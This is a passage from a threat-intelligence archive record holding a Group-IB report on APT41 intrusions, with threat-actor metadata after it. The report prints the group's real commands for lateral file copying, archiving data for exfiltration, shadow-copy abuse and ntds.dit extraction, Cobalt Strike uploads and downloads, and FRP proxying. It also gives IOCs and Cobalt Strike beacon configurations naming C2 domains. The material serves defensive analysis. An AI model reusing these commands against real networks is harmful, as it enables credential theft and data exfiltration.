(\\\\[redacted]\\ADMIN$\\c3632b3.exe)\r\ncopy c:\\users\\public\\COMSysUpdate.exe \\\\172.19.97.101\\c$\\users\\public\\COMSysUpdate.exe\r\nCollection\r\nArchive Collected Data: Archive via Utility – T1560.001\r\nTo collect data, APT41 downloaded a portable archiver to compromised devices. 
The group archived the necessary files and exfiltrated them to their intermediate server.\r\n7z.exe a syslog.7z Intl\r\n7z.exe a iislog.7z Intl\r\n7z.exe a Ops.7z C:\\PerfLogs\\Ops\\\r\nC:\\perflogs\\7z.exe a -tzip C:\\perflogs\\nt.zip C:\\perflogs\\temp\\\r\nData from Configuration Repository – T1602\r\nOn the network belonging to a software developer, the hackers gained access to the developer’s private Git repository (cloned over SSH from an internal host, as the commands below show). The repository was used to store various sensitive data such as credentials for remote servers, private certificates, and a list of servers.\r\nshell git clone \"ssh://jenkins@{redacted}:29418/DevOps/Playbook2\"\r\nshell git clone \"ssh://jenkins@{redacted}:29418/DevOps/Inventory/Cloud/Intl\"\r\nshell git clone \"ssh://jenkins@192.168.0.251:29418/DevOps/Inventory\"\r\nData from Local System – T1005\r\nThe group obtained files from shadow copies and from the Windows event logs.\r\nvssadmin list shadows\r\nvssadmin create shadow /for=c:\r\nvssadmin delete shadows /for=c: /quiet\r\nesentutl /p /o ntds.dit\r\ncopy \"C:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx\" \"C:\\PerfLogs\\mwt.evtx\"\r\nrd:true /q:\"*[System[(EventID=4624 or EventID=4648 or EventID=4672)] and EventData[(Data[@Name='LogonType']='2' or Data[@Name='LogonType']='10')]]\" | findstr /i /c:\"Date\" /c:\"Logon Type:\" /c:\"Account Name\" /c:\"Workstation Name:\" /c:\"Source Network Address\"\r\nCommand and Control\r\nAs mentioned above, most APT41 attacks were conducted using Cobalt Strike.\r\nApplication Layer Protocol: Web Protocols – T1071.001\r\nThe group used HTTP and HTTPS listeners to communicate with C\u0026C servers.\r\nApplication Layer Protocol: DNS – T1071.004\r\nTo hide all 
communication with C\u0026C servers, the threat actors also used DNS tunnels.\r\nIngress Tool Transfer – T1105\r\nThe threat actors used Cobalt Strike to upload their files to compromised devices. For certain targeted organizations, the group uploaded files from special directories named after the compromised organization.\r\nupload C:\\Users\\Administrator\\Desktop\\cs\\dns\\COMSysUpdate.ocx\r\nupload C:\\Users\\Administrator\\Desktop\\webshell\\uploada4.aspx\r\nupload c:\\users\\alex\\desktop\\smb.exe\r\nupload C:\\Users\\Administrator\\Desktop\\cs\\SecurityHealthSystray.dll\r\nupload C:\\Users\\Administrator\\Desktop\\cs\\install.bat\r\nupload C:\\Users\\jack\\Desktop\\tmp\\cs_shell\\server\\install.bat\r\nupload C:\\Users\\jack\\Desktop\\tmp\\cs_shell\\server\\bthsvc64.dll\r\nupload C:\\Users\\jack\\Desktop\\tmp\\procdump64.exe\r\nupload C:\\Users\\jack\\Desktop\\{redacted}\\244\\mciwave32.dll\r\nupload C:\\Users\\Admin\\Desktop\\{redacted}\\HTTPS\\LxpSvc.exe\r\nupload C:\\Users\\Admin\\Desktop\\Webshell\r\nupload C:\\Users\\Admin\\Desktop\\{redacted}\\webshell\\test4.aspx\r\nupload C:\\Users\\Admin\\Desktop\\{redacted}\\远控\\service\\install.bat\r\nupload C:\\Users\\Admin\\Desktop\\{redacted}\\LxpSrvc.dll\r\nupload C:\\Users\\Admin\\Desktop\\{redacted}\\远控\\exe\\dfss.dll\r\nupload C:\\Users\\Administrator\\Desktop\\BadPotatoNet4.exe\r\nThe directory name 远控 in the paths above is Chinese for “remote control”.\r\nProxy: Internal Proxy – T1090.001\r\nIn the attacks we analyzed, APT41 often used the FRP client (frpc) to proxy traffic.\r\nfrcp.exe -c frcp.ini\r\nExfiltration\r\nExfiltration Over C2 Channel – T1041\r\nAt the exfiltration stage, APT41 gained access to various server configurations, backup data, and user data. 
The group most likely did not exfiltrate a large number of confidential documents.\r\ndownload D:\\projects\\{redacted}\\web.config\r\ndownload D:\\projects\\{redacted}\\css\\help.txt\r\ndownload D:\\System Volume Information\\002.dat\r\ndownload D:\\projects\\{redacted}\\Web.config\r\ndownload D:\\{redacted}\\{redacted}20210301120008.txt\r\ndownload c:\\ftpcmd.dat\r\ndownload c:\\AppTextFile.txt\r\ndownload c:\\Users\\Administrator\\Desktop\\OfcNTCer.dat\r\ndownload c:\\Users\\{redacted}\\Desktop\\172.16.11.103.png\r\ndownload c:\\Users\\{redacted}\\Desktop\\FTP batch\\ftp_servername.bat\r\ndownload c:\\Users\\{redacted}\\Desktop\\FTP batch\\[redacted].bat\r\ndownload c:\\Users\\{redacted}\\Desktop\\tm remote chat.txt\r\ndownload c:\\Temp\\netstat.txt\r\ndownload c:\\Program Files (x86)\\Trend Micro\\OfficeScan\\PCCSRV\\Admin\\web.config\r\ndownload c:\\Program Files (x86)\\Trend Micro\\OfficeScan\\PCCSRV\\Admin\\Utility\\SQL\\web.config\r\ndownload c:\\Program Files (x86)\\Trend Micro\\OfficeScan\\PCCSRV\\Web\\web.config\r\ndownload c:\\Program Files (x86)\\Trend Micro\\OfficeScan\\PCCSRV\\Web_OSCE\\Web_console\\HTML\\widget_old\\repository\\inc\\class\r\ndownload c:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ASP.NETWebAdminFiles\\web.config\r\ndownload c:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\web.config\r\ndownload c:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ASP.NETWebAdminFiles\\web.config\r\ndownload c:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\web.config\r\ndownload c:\\Windows\\WinSxS\\amd64_clientdeployment-connectsite_31bf3856ad364e35_10.0.14393.0_none_d2443e4100c72a7c\\web.config\r\ndownload c:\\Users\\{redacted}\\Desktop\\Office Scan Backup\\Private\\AosBackup.txt\r\nHunting for APT41 Cobalt Strike servers\r\nThis section explains how to hunt for APT41’s network infrastructure. 
The group usually uses\r\ncertain servers exclusively to host the Cobalt Strike framework, while it uses others only for\r\nactive scanning through Acunetix. The Group-IB TI team identified servers that were used for both,\r\nhowever. It is important to note that all APT41 servers were protected using the cloud service CloudFlare,\r\nwhich hides the real server addresses. That said, the Group-IB Threat Intelligence system detects\r\nserver backends belonging to various threat actors, including APT41.\r\nAs a result, our clients are among the first to proactively block new servers belonging to threat\r\nactors.\r\nTo identify APT41 infrastructure, it is essential to describe how Cobalt Strike operates.\r\nThis framework serves as an intermediate server to which threat actors can connect from other\r\ndevices. These operator devices connect to the Cobalt Strike server (usually, but not always) on port 50050.\r\nBy default, the server generates a self-signed SSL certificate, which contains the “Cobalt Strike”\r\nstrings.\r\nOne of the default Cobalt Strike certificates\r\nHowever, the servers used in these campaigns have different certificates on this port: the two\r\ncertificates below, with the values “fortawesome”, are unique and clearly indicate that this Cobalt\r\nStrike image belongs to APT41.\r\nThe next notable characteristic of APT41’s Cobalt Strike servers that the Group-IB team identified is the use of custom SSL\r\ncertificates on listeners. Listeners are used to accept connections from the payload in order to\r\nmaintain communication between bots and the C\u0026C server. The group uses SSL certificates for\r\nHTTPS listeners. 
In the examples below, APT41 used unique SSL certificates that mimicked\r\n“Microsoft”, “Facebook” and “CloudFlare”.\r\nAccording to Group-IB Threat Intelligence data, servers with such certificates first emerged in early\r\n2020. By the end of 2021, their number reached 106. This means that the Group-IB team discovered\r\nmore than 100 Cobalt Strike servers that are used only by APT41. Unsurprisingly, most are no longer\r\nactive.\r\nSSL-cert SHA1-8c93083440cd9ce5fe4cf58c3348bd85bdf07f6c\r\nSSL-cert SHA1-0cc907db409a259611f56abc7dead19c6ed51fd0\r\nArtifacts and other noteworthy findings\r\nChinese strings\r\nAn analysis conducted by Group-IB experts revealed the following key artifacts pointing to the\r\norigin of APT41:\r\nUsing mainly Chinese IP addresses to communicate with Cobalt Strike servers.\r\nUsing Chinese characters on the devices from which the attacks were conducted.\r\nUsing a specific Pinyin format for directory names.\r\n171.208.242.0/24 CHINANET\r\n171.208.241.0/24 CHINANET\r\n110.191.217.0/24 CHINANET\r\n102.223.72.0/22 SUNNETWORK-SA\r\n103.165.84.0/24 GEM1-HK\r\n178.79.128.0/18 US-LINODE-20100510\r\n45.152.112.0/23 ALANYHQ\r\n60.248.225.0/24 HINET-NET\r\n61.221.57.0/24 HINET-NET\r\nPinyin is a romanization system that represents the sounds of the Chinese language through\r\nthe use of the Latin alphabet. In the case below, a directory is called “yuming”, which in Chinese\r\nmeans “domain name”.\r\nSeparate directories are used for certain organizations.\r\n“Working” hours of APT41\r\nResearch into APT41 malware campaigns dated 2021 helped align all the group’s timestamps to\r\nUTC+8. As a result, we have come to the following conclusions. The group starts working at 9 AM\r\nand its activity stops around 7 PM. It is clear that APT41 members do not work long hours, unlike\r\nfinancially motivated hacker groups like Conti, for example. Groups like Conti tirelessly “work” 14\r\nhours a day without any days off, which we described in detail in our report titled “CONTI ARMADA:\r\nTHE ARMATTACK CAMPAIGN”.\r\nAccording to this map, the following countries are located in this time zone:\r\nRussia\r\nAustralia\r\nMalaysia\r\nSingapore\r\nChina\r\nand others\r\nConclusion\r\nFor a long time, security researchers believed that cracked copies of legitimate pentesting and red teaming\r\ntools, which are widely used by hacker groups, make threat hunting and attribution more difficult.\r\nAmong such tools, Cobalt Strike stands out. In the past, the tool was appreciated by cybercriminal\r\ngangs targeting banks, while today it is popular among various threat actors regardless of their\r\nmotivation, including infamous ransomware operators. That is why it is essential to proactively\r\ndiscover servers running this framework and to attribute those servers to specific threat actors. It is\r\na crucial task for all cybersecurity teams that want to prevent attacks.\r\nIn this blog post, we shared examples of identifying and correlating Cobalt Strike with campaigns\r\nconducted by the state-sponsored group APT41. 
Thanks to our proprietary Group-IB Threat\r\nIntelligence system, which detects and attributes such attacks automatically, our clients are the first\r\nto be informed about cyberthreats, including all the relevant indicators of compromise and TTPs.\r\nThey are also the first to obtain the names of compromised organizations, which helps them avoid\r\nsupply-chain attacks and make their network infrastructure more secure.\r\nIn line with Group-IB’s mission of fighting cybercrime, we will continue to explore the methods, tools,\r\nand tactics used by one of the oldest and still dangerous groups, APT41. We will also continue to\r\ninform and warn targeted organizations worldwide. We always strive to ensure that organizations\r\nunder attack are notified as quickly as possible to help reduce potential damage. We also consider it\r\nour responsibility to share our findings with the cybersecurity community and encourage\r\nresearchers to study advanced threats, share data, and use our technologies to combat cybercrime\r\n— together.\r\nIf you are interested in what we do and would like to become an expert in the same field, you can\r\ntake our Digital Forensics, Incident Response, and Threat Intelligence training courses. We also\r\nwelcome applications to join the Group-IB team. 
Please check our vacancies on the website.\r\nIOCs\r\nIP | First seen | Last seen | C\u0026C domains\r\n45.142.214[.]242 | 2021-04-12 | 2021-07-08 | delaylink[.]tk, javaupdate.biguserup[.]workers.dev\r\n45.153.231[.]31 | 2021-05-31 | 2021-06-26 |\r\n45.144.31[.]31 | 2021-06-04 | 2021-06-26 | colunm[.]tk\r\n45.142.214[.]56 | 2021-06-09 | 2021-07-20 | mute-pond-371d.zalocdn[.]workers.dev, cs16.dns04[.]com\r\n2021- gentle-voice-\r\nCobalt Strike Beacons\r\n45.142.214.242: \"config_payload\": { \"process-inject-stub\": \"fbM7aRSiLoJ01wyIz1ATTQ==\",\r\n\"http-get.uri\": \"javaupdate.biguserup.workers.dev,/jquery-3.3.1.min.js\", \"stage.cleanup\": 1,\r\n\"http-get.server.output\": \"`T\", \"post-ex.spawnto_x64\": \"%windir%\\\\sysnative\\\\svchost.exe -k\r\nnetsvcs\", \"post-ex.spawnto_x86\": \"%windir%\\\\syswow64\\\\svchost.exe -k netsvcs\",\r\n\"watermark\": 305419896, \"process-inject-use-rwx\": 64, \"dns_idle\": 134744072, \"sleeptime\":\r\n60000, \"publickey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCY/kAU3i5Cw6hXsXbgonByGxgt0JX\r\n\"maxdns\": 255, \"http-post.client\": \"Accept: */*2Referer:\r\nhttps://javaupdate.biguserup.workers.dev/Accept-Encoding: *\u0026Host:\r\njavaupdate.biguserup.workers.dev__cfduid\", \"ssl\": true, \"publickey_md5\":\r\n\"531c720aae6e053b9db9be8e7b56f78f\", \"http-post.uri\": \"/jquery-3.2.2.min.js\", \"jitter\": 41,\r\n\"cookieBeacon\": 1, \"port\": 443, \"process-inject-start-rwx\": 64, \"http-get.client\": \"Accept-Encoding: *\u0026Host: javaupdate.biguserup.workers.devAccept: 
*/*2Referer:\r\nhttps://javaupdate.biguserup.workers.dev/__cfduid=Cookie\", \"http-get.verb\": \"GET\",\r\n\"proxy_type\": 2, \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0)\r\nGecko/20100101 Firefox/57.0\" } },\r\n45.144.31.31: \"config_payload\": { \"process-inject-stub\": \"d5nX4wNnwCo18Wx3jr4tPg==\", \"http-get.uri\": \"cs.colunm.tk,/__utm.gif\", \"http-get.server.output\": \"\", \"post-ex.spawnto_x64\":\r\n\"%windir%\\\\sysnative\\\\rundll32.exe\", \"post-ex.spawnto_x86\":\r\n\"%windir%\\\\syswow64\\\\rundll32.exe\", \"watermark\": 305419896, \"process-inject-use-rwx\": 64,\r\n\"sleeptime\": 60000, \"publickey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCBkyCWDMC1Q6VqRZIY35+iU7KtrHy\r\n\"maxdns\": 255, \"http-post.client\": \"\u0026Content-Type: application/octet-streamid\", \"ssl\": true,\r\n\"publickey_md5\": \"9cdb3fca6156c6cbed2f01d6431b3dfb\", \"http-post.uri\": \"/submit.php\",\r\n\"cookieBeacon\": 1, \"port\": 8443, \"process-inject-start-rwx\": 64, \"http-get.client\": \"Cookie\",\r\n\"http-get.verb\": \"GET\", \"proxy_type\": 2, \"user-agent\": \"Mozilla/5.0 (compatible; MSIE 9.0;\r\nWindows NT 6.1; WOW64; Trident/5.0; MANM; MANM)\" }\r\n45.142.212.47: \"config_payload\": { \"process-inject-stub\": \"9LoFKCrbYlLergvfu7Ki8A==\", \"http-get.uri\": \"mute-pond-371d.zalocdn.workers.dev,/jquery-3.3.1.min.js\", \"stage.cleanup\": 1, \"http-get.server.output\": \"`T\", \"post-ex.spawnto_x64\": \"%windir%\\\\sysnative\\\\svchost.exe -k\r\nnetsvcs\", \"post-ex.spawnto_x86\": \"%windir%\\\\syswow64\\\\svchost.exe -k netsvcs\", \"process-inject-use-rwx\": 64, \"dns_idle\": 134744072, \"sleeptime\": 32547, \"publickey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC3WFlrP6k0u+i8ozfzb2lLZHkTokxc3l8\r\n\"maxdns\": 255, \"http-post.client\": \"Accept: */*4Referer: https://mute-pond-371d.zalocdn.workers.dev/Accept-Encoding: *(Host: mute-pond-371d.zalocdn.workers.dev__cfduid\", \"ssl\": true, \"publickey_md5\":\r\n\"a9020b0e5342fb8877d2fb213802132f\", 
\"http-post.uri\": \"/jquery-3.2.2.min.js\", \"jitter\": 41,\r\n\"cookieBeacon\": 1, \"port\": 443, \"process-inject-start-rwx\": 64, \"http-get.client\": \"Accept-Encoding: *(Host: mute-pond-371d.zalocdn.workers.devAccept: */*4Referer: https://mute-pond-371d.zalocdn.workers.dev/__cfduid=Cookie\", \"http-get.verb\": \"GET\", \"proxy_type\": 2,\r\n\"user-agent\": \"Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD90M; wv) AppleWebKit/537.36\r\n(KHTML, like Gecko) Version/4.0\" } },\r\n185.250.150.22: \"config_payload\": { \"http-get.uri\": \"mute-pond-371d.zalocdn.workers.dev,/jquery-3.3.1.min.js\", \"stage.cleanup\": 1, \"http-get.server.output\": \"`T\",\r\n\"post-ex.spawnto_x64\": \"%windir%\\\\sysnative\\\\svchost.exe -k netsvcs\", \"post-ex.spawnto_x86\": \"%windir%\\\\syswow64\\\\svchost.exe -k netsvcs\", \"process-inject-use-rwx\":\r\n64, \"dns_idle\": 134744072, \"sleeptime\": 32547, \"publickey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCQ2/teGq2eUgU2sZjiJCCcKH7RgQrs\r\n\"maxdns\": 255, \"http-post.client\": \"Accept: */*4Referer: https://mute-pond-371d.zalocdn.workers.dev/Accept-Encoding: *(Host: mute-pond-371d.zalocdn.workers.dev__cfduid\", \"ssl\": true, \"publickey_md5\":\r\n\"398c270c67cd915134ebbf7108090789\", \"http-post.uri\": \"/jquery-3.2.2.min.js\", \"jitter\": 41,\r\n\"cookieBeacon\": 1, \"port\": 443, \"process-inject-start-rwx\": 64, \"http-get.client\": \"Accept-Encoding: *(Host: mute-pond-371d.zalocdn.workers.devAccept: */*4Referer: https://mute-pond-371d.zalocdn.workers.dev/__cfduid=Cookie\", \"http-get.verb\": \"GET\", \"proxy_type\": 2,\r\n\"user-agent\": \"Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD90M; wv) AppleWebKit/537.36\r\n(KHTML, like Gecko) Version/4.0\" }
",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.group-ib.com/blog/apt41-world-tour-2021/"
	],
	"report_names": [
		"apt41-world-tour-2021"
	],
	"threat_actors": [
		{
			"id": "aada2650-7bef-45e4-8371-18c4318a7056",
			"created_at": "2022-10-25T15:50:23.422502Z",
			"updated_at": "2026-04-10T02:00:05.278662Z",
			"deleted_at": null,
			"main_name": "Suckfly",
			"aliases": [
				"Suckfly"
			],
			"source_name": "MITRE:Suckfly",
			"tools": [
				"Nidiran"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a4a3c2a4-992d-4ce6-8c97-e39b23da9a26",
			"created_at": "2022-10-25T16:07:24.242051Z",
			"updated_at": "2026-04-10T02:00:04.909353Z",
			"deleted_at": null,
			"main_name": "Suckfly",
			"aliases": [
				"G0039"
			],
			"source_name": "ETDA:Suckfly",
			"tools": [
				"Backdoor.Nidiran",
				"Nidiran",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"gsecdump",
				"smbscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "49822165-5541-423d-8808-1c0a9448d588",
			"created_at": "2022-10-25T16:07:23.384093Z",
			"updated_at": "2026-04-10T02:00:04.575678Z",
			"deleted_at": null,
			"main_name": "Barium",
			"aliases": [
				"Brass Typhoon",
				"Pigfish",
				"Starchy Taurus"
			],
			"source_name": "ETDA:Barium",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"Barlaiy",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Destroy RAT",
				"DestroyRAT",
				"Kaba",
				"Korplug",
				"POISONPLUG",
				"PlugX",
				"RbDoor",
				"RedDelta",
				"RibDoor",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Winnti",
				"Xamtrav",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7b039cc0-33b6-495a-b4ca-649d096b993d",
			"created_at": "2023-01-06T13:46:38.482654Z",
			"updated_at": "2026-04-10T02:00:02.99265Z",
			"deleted_at": null,
			"main_name": "APT22",
			"aliases": [
				"G0039",
				"Suckfly",
				"BRONZE OLIVE",
				"Group 46"
			],
			"source_name": "MISPGALAXY:APT22",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c7d9878a-e691-4c6f-81ae-84fb115a1345",
			"created_at": "2022-10-25T16:07:23.359506Z",
			"updated_at": "2026-04-10T02:00:04.556639Z",
			"deleted_at": null,
			"main_name": "APT 41",
			"aliases": [
				"BrazenBamboo",
				"Bronze Atlas",
				"Double Dragon",
				"Earth Baku",
				"G0096",
				"Grayfly",
				"Operation ColunmTK",
				"Operation CuckooBees",
				"Operation ShadowHammer",
				"Red Kelpie",
				"SparklingGoblin",
				"TA415",
				"TG-2633"
			],
			"source_name": "ETDA:APT 41",
			"tools": [
				"9002 RAT",
				"ADORE.XSEC",
				"ASPXSpy",
				"ASPXTool",
				"AceHash",
				"Agent.dhwf",
				"Agentemis",
				"AndroidControl",
				"AngryRebel",
				"AntSword",
				"BLUEBEAM",
				"Barlaiy",
				"BlackCoffee",
				"Bladabindi",
				"BleDoor",
				"CCleaner Backdoor",
				"CHINACHOPPER",
				"COLDJAVA",
				"China Chopper",
				"ChyNode",
				"Cobalt Strike",
				"CobaltStrike",
				"Crackshot",
				"CrossWalk",
				"CurveLast",
				"CurveLoad",
				"DAYJOB",
				"DBoxAgent",
				"DEADEYE",
				"DEADEYE.APPEND",
				"DEADEYE.EMBED",
				"DEPLOYLOG",
				"DIRTCLEANER",
				"DUSTTRAP",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"DodgeBox",
				"DragonEgg",
				"ELFSHELF",
				"EasyNight",
				"Farfli",
				"FunnySwitch",
				"Gh0st RAT",
				"Ghost RAT",
				"HDD Rootkit",
				"HDRoot",
				"HKDOOR",
				"HOMEUNIX",
				"HUI Loader",
				"HidraQ",
				"HighNoon",
				"HighNote",
				"Homux",
				"Hydraq",
				"Jorik",
				"Jumpall",
				"KEYPLUG",
				"Kaba",
				"Korplug",
				"LATELUNCH",
				"LOLBAS",
				"LOLBins",
				"LightSpy",
				"Living off the Land",
				"Lowkey",
				"McRAT",
				"MdmBot",
				"MessageTap",
				"Meterpreter",
				"Mimikatz",
				"MoonBounce",
				"MoonWalk",
				"Motnug",
				"Moudour",
				"Mydoor",
				"NTDSDump",
				"PACMAN",
				"PCRat",
				"PINEGROVE",
				"PNGRAT",
				"POISONPLUG",
				"POISONPLUG.SHADOW",
				"POTROAST",
				"PRIVATELOG",
				"PipeMon",
				"PlugX",
				"PortReuse",
				"ProxIP",
				"ROCKBOOT",
				"RbDoor",
				"RedDelta",
				"RedXOR",
				"RibDoor",
				"Roarur",
				"RouterGod",
				"SAGEHIRE",
				"SPARKLOG",
				"SQLULDR2",
				"STASHLOG",
				"SWEETCANDLE",
				"ScrambleCross",
				"Sensocode",
				"SerialVlogger",
				"ShadowHammer",
				"ShadowPad Winnti",
				"SinoChopper",
				"Skip-2.0",
				"SneakCross",
				"Sogu",
				"Speculoos",
				"Spyder",
				"StealthReacher",
				"StealthVector",
				"TERA",
				"TIDYELF",
				"TIGERPLUG",
				"TOMMYGUN",
				"TVT",
				"Thoper",
				"Voldemort",
				"WIDETONE",
				"WINNKIT",
				"WINTERLOVE",
				"Winnti",
				"WyrmSpy",
				"X-Door",
				"XDOOR",
				"XMRig",
				"XShellGhost",
				"Xamtrav",
				"ZXShell",
				"ZoxPNG",
				"certutil",
				"certutil.exe",
				"cobeacon",
				"gresim",
				"njRAT",
				"pwdump",
				"xDll"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "273a41a8-5115-4f55-865f-0960a765f18c",
			"created_at": "2022-10-25T16:07:24.397947Z",
			"updated_at": "2026-04-10T02:00:04.974605Z",
			"deleted_at": null,
			"main_name": "Wicked Spider",
			"aliases": [
				"APT 22",
				"Bronze Export",
				"Bronze Olive",
				"Wicked Spider"
			],
			"source_name": "ETDA:Wicked Spider",
			"tools": [
				"Agent.dhwf",
				"AngryRebel",
				"Destroy RAT",
				"DestroyRAT",
				"DoublePulsar",
				"EternalBlue",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"Kaba",
				"Korplug",
				"Moudour",
				"Mydoor",
				"PCRat",
				"PlugX",
				"RedDelta",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Xamtrav"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "945a572f-ebe3-4e2f-a288-512fe751cfa8",
			"created_at": "2022-10-25T16:07:24.413971Z",
			"updated_at": "2026-04-10T02:00:04.97924Z",
			"deleted_at": null,
			"main_name": "Winnti Group",
			"aliases": [
				"G0044",
				"Leopard Typhoon",
				"Wicked Panda",
				"Winnti Group"
			],
			"source_name": "ETDA:Winnti Group",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"FunnySwitch",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "00e7a6ed-1880-4391-b0b9-1f46fae0e5cc",
			"created_at": "2025-08-07T02:03:24.591024Z",
			"updated_at": "2026-04-10T02:00:03.717645Z",
			"deleted_at": null,
			"main_name": "BRONZE EXPORT",
			"aliases": [
				"TG-3279 ",
				"Wicked Spider "
			],
			"source_name": "Secureworks:BRONZE EXPORT",
			"tools": [
				"Conpee",
				"PlugX",
				"PwDump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "1d63fba2-f042-41ca-8a72-64c6e737d295",
			"created_at": "2025-08-07T02:03:24.643647Z",
			"updated_at": "2026-04-10T02:00:03.719558Z",
			"deleted_at": null,
			"main_name": "BRONZE OLIVE",
			"aliases": [
				"APT22 ",
				"Barista",
				"Group 46 ",
				"Suckfly "
			],
			"source_name": "Secureworks:BRONZE OLIVE",
			"tools": [
				"Angryrebel",
				"DestroyRAT",
				"PlugX"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775490773,
	"ts_updated_at": 1775791947,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b8c8f7882ae6d87fb4652b6fbae63e6119856445.pdf",
		"text": "https://archive.orkl.eu/b8c8f7882ae6d87fb4652b6fbae63e6119856445.txt",
		"img": "https://archive.orkl.eu/b8c8f7882ae6d87fb4652b6fbae63e6119856445.jpg"
	}
}